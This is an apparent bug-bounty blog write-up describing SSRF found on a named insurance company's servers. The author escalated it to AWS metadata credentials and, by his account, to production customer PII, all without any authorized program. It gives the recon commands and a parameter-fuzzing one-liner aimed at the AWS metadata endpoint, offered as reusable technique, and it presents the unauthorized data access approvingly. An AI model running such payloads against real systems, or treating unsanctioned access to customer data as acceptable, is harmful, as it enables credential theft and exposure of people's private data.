How I got access to Maxlifeinsurance insurance company customer PII INFO by AWS metadata access through SSRF

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be describing How I was able Find multiple SSRF with aws metadata access ON a Maxlifeinsurance insurance company System and Get access to there production server.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

SPECIAL COVID-19 Note:

Don’t go outside without any reason . Stay home be safe and also safe other. Special request to my fellow bug-bounty hunter Take care of your health and get vaccinated.

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.

Story Behind the bug:

This is the write of my compromising the insurance company production and get access to 100GB customer High profile data by SSRF and escalating it get their aws production server customer stored data.

There was no Responsive disclosure program or Bugbounty program but still i report SSRF aws metadata access bug and Many other critical bug because of them the customer would have suffer if it have goes to some bad guys hand. The insurance company don’t even said THANK YOU but I was HAPPY by reporting the bug. So, bugbounty is not always about money, it also about helping the company to secured them.

Here it goes:

Suppose we assume the target name is example.com , as there no Responsive disclosure program or Bug-bounty program So I started hunting on the Main Domain.

maxlifeinsurance.com

To gather all the subdomain from internet archives i have used subfinder , waybackurls tool and gau.

Command used:

subfinder -d maxlifeinsurance.com silent

gau -subs maxlifeinsurance.com

waybackurls maxlifeinsurance.com

So the chance of missing the subdomain still exist so in-order to be ahead of the game I don’t want to miss any subdomain for testing so I used subfinder and pipe to waybackurls to get all the domain for all the subdomain if exist and save it to a file.

So the final command will look like this:

So in order to expand by target scope I decide to gather all subdomain and url endpoint for target.

gau -subs maxlifeinsurance.com| grep “=”>> vul1.txt

waybackurls maxlifeinsurance.com |grep “=” >> vul2.txt

subfinder -d maxlifeinsurance.com -silent | gau -subs | grep “=” >> vul3.txt

Now collecting all subdomain in one and sorting out the duplicates

cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt

NOW the actual SSRF hunting start:

Will Playing around main domain for couple hours with my burp I came across an endpoint “XXXXXX.jsp” which got my attention As it was used for tax invoice data. But While going through the main app i came to know that it was used by many other function like product tax invoice and sell tax invoice.

Its gave me the feeling that one or more function using the endpoint “XXXXXX.jsp” for the tax invoice data. So started fuzzing for the vulnerable parameter to get SSRF but no success . As i was Aware that it can used for other function, So i collect all the url from waybackurl and internet archive .

Now , I have all the url with endpoint from the waybackurl machine and gau and internet archive. So, I used my bash skill to collect all the endpoint from the unique_sub.txt.

cat unique_sub.txt | sed ‘s/^.*.com//’ | sed ‘s/?.*//’ >> endpoint_path.txt

So, above command will remove target.com and anything after “?” like below as flow

/XXXXX/invoice

etc….

Now Once i have the all the endpoint now I append the endpoint with “XXXXXX.jsp” using the bash.

cat endpoint_path.txt | sed ‘s/$/\/XXXXXX.jsp/’

Now I have added the “XXXXXX.jsp” to all the endpoint path now i will the use my Magic parameter sparing tricks to find the vulnerable SSRF parameter.

xargs -a /root/magicparameter/ssrf.txt -I@ bash -c ‘for url in $(cat endpoint_path.txt | sed “s/$/\/XXXXXX.jsp/”); do echo “http://$url?@=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data/hostname”;done’ | httpx -silent -status-code -content-length -extract-regex “compute.internal”

I Finally got 2more SSRF by same path on different subdomain using same endpoint and path.

After that was able to to extract the AWS access key and secret . And using those aws key and secret I was able to using the production server metadata where i can see the customer data for the insurance company.

After seeing this my reaction …

Reporting them was very hard as there was no email or any security disclosure program or no any bug-bounty. Finally the got their security team email I quickly reported the bug and they fixed the bug. Not even a Thank you or knowledge my work but i happy my help them to secure them self.

Takeaway

I’m sure that a lot of security researcher had already see there process but this how I approach for Finding an endpoint and automating with to finding multiple vulnerable targets.

So Bug-bounty is not always about money, It is also about doing good to the society by help company to Fix the bug. Though the Maxlifeinsurance don’t even said a thank you But there as My success that I have help them to secured their infrastructure.

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.
LinkedIn Profile: https://www.linkedin.com/in/santoshlegend12tech/